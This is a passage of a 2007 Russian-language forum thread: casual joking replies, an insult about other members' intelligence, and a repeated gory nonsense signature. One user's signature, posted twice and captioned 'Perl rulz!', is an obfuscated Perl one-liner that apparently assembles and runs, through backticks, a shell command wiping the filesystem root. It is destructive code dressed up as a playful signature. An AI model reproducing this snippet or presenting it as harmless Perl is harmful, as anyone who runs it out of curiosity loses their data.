вы бы знали какое палево мне напротив шефа сидеть и затыкать себе нос, лишь бы ни звука смеха ни вышло))))
зы: если кто не догадалсо IAMWORM это йа) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Black_Lily666
[Фото]
13:43 31-07-2007 Новый комментарий от Black_Lily666 в дневнике Black_Lily666 : "Дневник Black_Lily666"
на сообщение разборочки
[user=MaynardK], [user=Systemaniac], господи,народ))знаю я всё...вам постебать было охото,а мне поржать))так что друг другу приятное сделали... _________________ Fortuna non penis in manus non recipe
зы: я там еще в тему про лп свои пять копеек вставил))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Последний раз редактировалось: ALuserX (Сб Авг 04, 2007 7:43 pm), всего редактировалось 1 раз
большенство здесь на уровне 11 лет, да еще умственно отсталых.....
разговоры насчет аула это вообще жесть... _________________ Define the riddles of my mind
nothing is really as it seems
Ты решил разрушит мой мозг этой ссылкой?Ну чтож тебе это удалось. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Ну чтож ему это удалось. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.